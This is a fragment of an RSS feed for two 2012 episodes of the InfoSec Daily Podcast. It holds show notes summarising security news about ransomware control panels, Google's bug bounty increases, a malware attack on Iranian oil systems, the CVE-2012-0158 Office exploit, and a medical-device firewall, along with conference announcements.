<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Identified by</span><a href="http://www.symantec.com/connect/blogs/ransomware-and-silence-locker-control-panel"><span style="font-size:15px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;"> Symantec</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> as Trojan.Ransomlock.K, the malicious element communicates with a command and control server from which it receives its orders.</span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The interface that allows the cybercrooks to communicate with their Trojan is called Silent Locker Control Panel and according to the experts, it is somewhat similar to other control panel used for pieces of malware such as ZeuS and SpyEye.</span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The Russian variant of the Silent Locker Control Panel found by experts offers a number of options. First of all, it tracks the infected computer&rsquo;s location and date, information that can be used for billing.</span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Also based on the location, the cybercriminal can choose what picture the ransomware displays when it takes over a computer. For instance, if the victim resides in the UK, a picture of the Metropolitan Police can be used, the default image being the one shown in the screenshot.</span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">If notifications that rely on the reputation of a law enforcement agency don&rsquo;t work, the fraudsters can always turn to fake Windows Security Checks or other scams that may convince the victim that his/her device is being blocked for performing illegal activities, or even because of some phony system errors.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:16px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:16px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source:</span><span style="font-size:16px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> &nbsp;</span><a href="http://www.computerworld.com/s/article/9226476/Google_boosts_Web_bug_bounties_to_20_000"><span style="font-size:16px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.computerworld.com/s/article/9226476/Google_boosts_Web_bug_bounties_to_20_000</span></a></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Google today dramatically raised the bounties it pays independent researchers for reporting bugs in its core websites, services and online applications.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The search giant boosted the maximum reward from $3,133 to $20,000, and added a $10,000 payment to the program.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The Vulnerability Reward Program (VRP) will now pay $20,000 for vulnerabilities that allow remote code execution against google.com, youtube.com and other core domains, as well as what the company called &quot;highly sensitive services&quot; such as its search site, Google Wallet, Gmail and Google Play.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Remote code flaws found in Google&#39;s Web apps will also be rewarded $20,000.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The term &quot;remote code execution&quot; refers to the most serious category of vulnerabilities, those which when exploited allow an attacker to hijack a system and/or plant malware on a machine.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">A $10,000 bounty will be paid for SQL injection bugs or &quot;significant&quot; authentication bypass or data leak vulnerabilities, Google said in the</span><a href="http://www.google.com/about/company/rewardprogram.html"><span style="font-size:15px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;"> revised rules</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> for the program.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Other bugs, including cross-site scripting (XSS) and cross-site request forgery (XSRF) flaws, will be compensated with payments between $100 and $3,133, with the amount dependent on the severity of the bug and where the vulnerability resides.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:16px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:16px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source:</span><span style="font-size:16px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> &nbsp;</span><a href="http://www.bbc.com/news/technology-17811565"><span style="font-size:16px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.bbc.com/news/technology-17811565</span></a></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:16px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Iran has been forced to disconnect key oil facilities after suffering a malware attack on Sunday, say reports.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:16px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The computer virus is believed to have hit the internal computer systems at Iran&#39;s oil ministry and its national oil company.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:16px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Equipment on the Kharg island and at other Iranian oil plants has been disconnected from the net as a precaution.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:16px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Oil production had not been affected by the attack, said the Mehr news agency.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:16px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">However, the attack is believed to have been responsible for knocking offline the websites of the Iranian oil ministry and national oil company.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:16px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The Ministry website was back in action on Monday but the oil company site has remained unreachable.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:16px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">An Iranian oil ministry spokesperson was quoted as saying that data about users of the sites had been stolen as a result of the attack. Core data about Iran&#39;s oil industry remained safe because it was on computer systems that remain separate from the net, they added.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:16px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The terminal on Kharg Island handles about 90% of Iran&#39;s oil exports.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:16px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:16px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">[end]</span></p>
]]></content:encoded>
			<wfw:commentRss>http://www.isdpodcast.com/episode-652-cve-2012-0158-ning-ransomlock-20k-vrp-and-iran/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
			<enclosure url="http://www.isdpodcast.com/podpress_trac/feed/3827/0/infosec-daily-podcast-episode-652.mp3" length="56040681" type="audio/mpeg" />
		<itunes:duration>0:38:54</itunes:duration>
		<itunes:subtitle>InfoSec Daily Podcast Episode 652 for April 24, 2012. Tonight&#39;s podcast is hosted by Rick Hayes, Boris Sverdlik, Karthik Rangarajan, and Themson Mester. &#160;

	Guest Co-Host Varun Sharma.
&#160;
Announcements
Linuxfest Northwest 2012
	When: Ap[...]</itunes:subtitle>
		<itunes:summary>InfoSec Daily Podcast Episode 652 for April 24, 2012. Tonight&#39;s podcast is hosted by Rick Hayes, Boris Sverdlik, Karthik Rangarajan, and Themson Mester. &#160;

	Guest Co-Host Varun Sharma.
&#160;
Announcements
Linuxfest Northwest 2012
	When: April 28-29, 2012
	Where: Bellingham Technical College &#8211; Bellingham, WA
	http://www.linuxfestnorthwest.org/
&#160;
AIDE 2012
	When: May 21-25, 2012
	Where: MU Forensic Science Center &#160;- Huntington, West Virginia
	http://www.appyide.org/
&#160;
LayerOne 2012
	When: May 26-27, 2012
	Where: Clarion Hotel &#8211; Anaheim, CA
	http://www.layerone.org
&#160;
Security 504: Hacker Techniques, Exploits &#38; Incident Handling &#8211; Matt Romanek
When: June 20 &#8211; 27, 2012
	Where: Courtyard Seattle Federal Way, WA 
	http://www.sans.org/mentor/details.php?nid=28014
	&#160;
Social Engineering Training
When: July 21-24, 2012
	Where: Black Hat Vegas
When: August 20-24, 2012
	Where: &#160;Bristol, UK
When: &#160;November 12-16, 2012
	Where: &#160;Columbia, MD
	http://www.social-engineer.com/social-engineer-training
&#160;
Inside and Out of the Social-Engineer Toolkit (SET)
	When: July 21 &#8211; 22, 2012
	When: July 23 &#8211; 24, 2012
	Where: Black Hat Vegas
	http://blackhat.com/html/bh-us-12/training/courses/bh-us-12-training_social_engineer_toolkit.html
&#160;
DerbyCon 2012 &#8211; The &#8220;Deuce&#8221; Reunion
	When: &#160;September 27-30, 2012
	Where: Louisville, KY
	http://www.derbycon.com
&#160;
Skydogcon
	When: October 26-28
	Where: Hotel Preston in Nashville, TN 
	http://www.skydogcon.com 
&#160;
Please consider making your &#160;Amazon purchases through our affiliate link. &#160;If you&#8217;re not familiar with the affiliate link it is locate the Affiliate Program link on the right hand side. Or simply use our QR Code Links.
Amazon:
	
Amazon UK:
	
You don't have a sufficient version of Flash Player to display this animation.
&#160;
Stories
Source: &#160;http://blogs.mcafee.com/mcafee-labs/cve-2012-0158-exploit-in-the-wild
Since last week, we have seen many specially crafted files exploiting CVE-2012-0158, a vulnerability in MSCOMCTL.OCX in Microsoft Office and some other Microsoft products. This exploit can be implemented in a variety of file formats, including RTF, Word, and Excel files. We have already found crafted RTF and Word files in the wild. In the malicious RTF, a vulnerable OLE file is embedded with object and objocx tags.
The following image shows an example of a crafted RTF file containing a vulnerable OLE file. You can see the signature of the OLE file in D0CF11E0. &#8230;
&#160;
Upon opening a crafted file with the vulnerable application, as in other document exploit files, we see an innocent file posing as bait, while in the background, the Trojan files are installed. Here are typical malware installation steps triggered by the vulnerable application, Word in this example:
1. The crafted document is opened by a Word process.
2. Exploiting the vulnerability triggers the shellcode in the OLE file.
3. The shellcode installs the Trojan(s) on the victim&#8217;s machine. Typically, the Trojan is installed in the following path:
%userProfile%Local SettingsTemp(filename).exe
4. The shellcode start a new process of Word and opens as bait an innocent document file embedded in the document. Typically the bait file is dropped at:
%userProfile%Local SettingsTemp(filename).doc
5. The shellcode terminates the Word process that opened the crafted document.
Because of steps 4 and 5, users will see Word quit and then immediately relaunch with the bait file. If you see this symptom, check with your system administrator.
&#160;
&#8230;.
Source: &#160;http://www.theinquirer.net/inquirer/news/2169403/100-million-users-affected-social-network-vulnerability
DO IT YOURSELF social networking company Ning is reportedly suffering from a slight security problem that could affect 100 million users.
Ning lets people set up their own gasbag social networking channels and is used by [...]</itunes:summary>
		<itunes:keywords>Podcast</itunes:keywords>
		<itunes:author>Rick Hayes with Dave Kennedy, Boris Sverdlik, Beau Woods, Adrian Crenshaw, Karthik Rangarajan, Geordy Rostad, Themson Mester, and Dr. Bonez.</itunes:author>
		<itunes:explicit>no</itunes:explicit>
		<itunes:block>no</itunes:block>
	</item>
		<item>
		<title>Episode 651 &#8211; MedMon, Flashback, King of Spammers, F1, and Israeli Hacker</title>
		<link>http://www.isdpodcast.com/episode-651-medmon-flashback-king-of-spammers-f1-and-israeli-hacker</link>
		<comments>http://www.isdpodcast.com/episode-651-medmon-flashback-king-of-spammers-f1-and-israeli-hacker#comments</comments>
		<pubDate>Tue, 24 Apr 2012 01:02:17 +0000</pubDate>
		<dc:creator>rick.hayes</dc:creator>
				<category><![CDATA[Podcast]]></category>

		<guid isPermaLink="false">http://www.isdpodcast.com/?p=3822</guid>
		<description><![CDATA[InfoSec Daily Podcast Episode 651 for April 21, 2012. Tonight&#39;s podcast is hosted by Rick Hayes, Dave Kennedy, Boris Sverdlik, Adrian Crenshaw, and Karthik Rangarajan. &#160; Announcements Linuxfest Northwest 2012 When: April 28-29, 2012 Where: Bellingham Technical College &#8211; Bellingham, WA http://www.linuxfestnorthwest.org/ &#160; AIDE 2012 When: May 21-25, 2012 Where: MU Forensic Science Center &#160;- [...]]]></description>
			<content:encoded><![CDATA[<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:16px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">InfoSec Daily Podcast Episode 651 for April 21, 2012. </span><span style="font-size:16px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Tonight&#39;s podcast is hosted by Rick Hayes, Dave Kennedy, Boris Sverdlik, Adrian Crenshaw, and Karthik Rangarajan.</span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:16px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">Announcements</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:16px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Linuxfest Northwest 2012<br class="kix-line-break" /><br />
	</span><span style="font-size:16px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: April 28-29, 2012<br class="kix-line-break" /><br />
	Where: Bellingham Technical College &#8211; Bellingham, WA<br class="kix-line-break" /><br />
	</span><a href="http://www.linuxfestnorthwest.org/"><span style="font-size:16px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.linuxfestnorthwest.org/</span></a></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:16px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">AIDE 2012<br class="kix-line-break" /><br />
	</span><span style="font-size:16px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: May 21-25, 2012<br class="kix-line-break" /><br />
	Where: MU Forensic Science Center &nbsp;- Huntington, West Virginia<br class="kix-line-break" /><br />
	</span><a href="http://www.appyide.org/"><span style="font-size:16px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.appyide.org/</span></a></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:16px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">LayerOne 2012<br class="kix-line-break" /><br />
	</span><span style="font-size:16px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: May 26-27, 2012<br class="kix-line-break" /><br />
	Where: Clarion Hotel &#8211; Anaheim, CA<br class="kix-line-break" /><br />
	</span><a href="http://www.layerone.org/"><span style="font-size:16px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.layerone.org</span></a></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:16px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Security 504: Hacker Techniques, Exploits &amp; Incident Handling &#8211; Matt Romanek</span></p>
<p><span style="font-size:16px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: June 20 &#8211; 27, 2012<br class="kix-line-break" /><br />
	Where: Courtyard Seattle Federal Way, WA</span><a href="http://www.sans.org/mentor/details.php?nid=28014"><span style="font-size:16px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> <br class="kix-line-break" /><br />
	</span><span style="font-size:16px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.sans.org/mentor/details.php?nid=28014</span></a><br />
	&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:16px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Social Engineering Training</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:16px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: July 21-24, 2012<br class="kix-line-break" /><br />
	Where: Black Hat Vegas</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:16px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: August 20-24, 2012<br class="kix-line-break" /><br />
	Where: &nbsp;Bristol, UK</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:16px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: &nbsp;November 12-16, 2012<br class="kix-line-break" /><br />
	Where: &nbsp;Columbia, MD<br class="kix-line-break" /><br />
	</span><a href="http://www.social-engineer.com/social-engineer-training"><span style="font-size:16px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.social-engineer.com/social-engineer-training</span></a></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:16px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Inside and Out of the Social-Engineer Toolkit (SET)<br class="kix-line-break" /><br />
	</span><span style="font-size:16px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: July 21 &#8211; 22, 2012<br class="kix-line-break" /><br />
	When: July 23 &#8211; 24, 2012<br class="kix-line-break" /><br />
	Where: Black Hat Vegas<br class="kix-line-break" /><br />
	</span><a href="http://blackhat.com/html/bh-us-12/training/courses/bh-us-12-training_social_engineer_toolkit.html"><span style="font-size:16px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://blackhat.com/html/bh-us-12/training/courses/bh-us-12-training_social_engineer_toolkit.html</span></a></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:16px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">DerbyCon 2012 &#8211; The &ldquo;Deuce&rdquo; Reunion<br class="kix-line-break" /><br />
	</span><span style="font-size:16px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: &nbsp;September 27-30, 2012<br class="kix-line-break" /><br />
	Where: Louisville, KY<br class="kix-line-break" /><br />
	</span><a href="http://www.derbycon.com/"><span style="font-size:16px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.derbycon.com</span></a></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:16px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Skydogcon</span><span style="font-size:16px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><br class="kix-line-break" /><br />
	When: October 26-28<br class="kix-line-break" /><br />
	Where: Hotel Preston in Nashville, TN <br class="kix-line-break" /><br />
	</span><a href="http://www.skydogcon.com/"><span style="font-size:16px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.skydogcon.com</span></a><span style="font-size:16px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:16px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Please consider making your &nbsp;Amazon purchases through our affiliate link. &nbsp;If you&rsquo;re not familiar with the affiliate link it is locate the Affiliate Program link on the right hand side.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:16px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">or simply use our QR Code Links.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:16px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Amazon:</span><img height="135px;" src="https://lh5.googleusercontent.com/VzdfnFwQhOeZ1TliObA6vDsndR1d6P0qIzkbkSTQdWwXIXMp7k3K0mEUKaVakUv7A2t7NmDKS00aBGqDm_nvYhnGfIDutrTKIsinEOQRTVKIShpp0Do" width="135px;" /></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:16px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Amazon UK:</span><img height="138px;" src="https://lh5.googleusercontent.com/1d9hr1nEey5Oz7suDRYMH0z2LuBxFwhWvulrYBpjBDRk_Y-5_eL3xzlEEABXmf_uVkytUg5ER8GjpUbcwDCD_0d0Gq96xKmXQOSy5Nh1Nv5DIUv6TN8" width="138px;" /></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:16px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><div class="awshortcode-carrousel align&amp;quot;right&amp;quot;"><object type="application/x-shockwave-flash" data="http://ws.amazon.com/widgets/q?ServiceVersion=20070822&amp;MarketPlace=US&amp;ID=V20070822%2FUS%2Finfdaipod-20%2F8010%2Fea25e3ef-5027-40e4-a56f-ad6cfcd06cb3&amp;Operation=GetDisplayTemplate" width="600" height="200"><param name="movie" value="http://ws.amazon.com/widgets/q?ServiceVersion=20070822&amp;MarketPlace=US&amp;ID=V20070822%2FUS%2Finfdaipod-20%2F8010%2Fea25e3ef-5027-40e4-a56f-ad6cfcd06cb3&amp;Operation=GetDisplayTemplate" /><param name="bgcolor" value="#fff" /><param name="quality" value="high" /><param name="allowscriptaccess" value="always" /><param name="wmode" value="transparent" /><p>You don't have a sufficient version of Flash Player to display this animation.</p></object></div></span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:16px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">Stories</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:16px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source:</span><span style="font-size:16px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> &nbsp;</span><a href="http://news.softpedia.com/news/Researchers-Make-Firewall-to-Protect-Medical-Devices-Against-Hackers-265970.shtml"><span style="font-size:15px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://news.softpedia.com/news/Researchers-Make-Firewall-to-Protect-Medical-Devices-Against-Hackers-265970.shtml</span></a></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:16px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">There has been a lot of buzz lately around the vulnerabilities that expose wireless medicald evices to cybercriminals, but researchers from Princeton and Purdue universities may have found a solution to these issues. They have created a firewall that&#39;s specially designed for these types of apparatus.</span></p>
<p>&nbsp;</p>
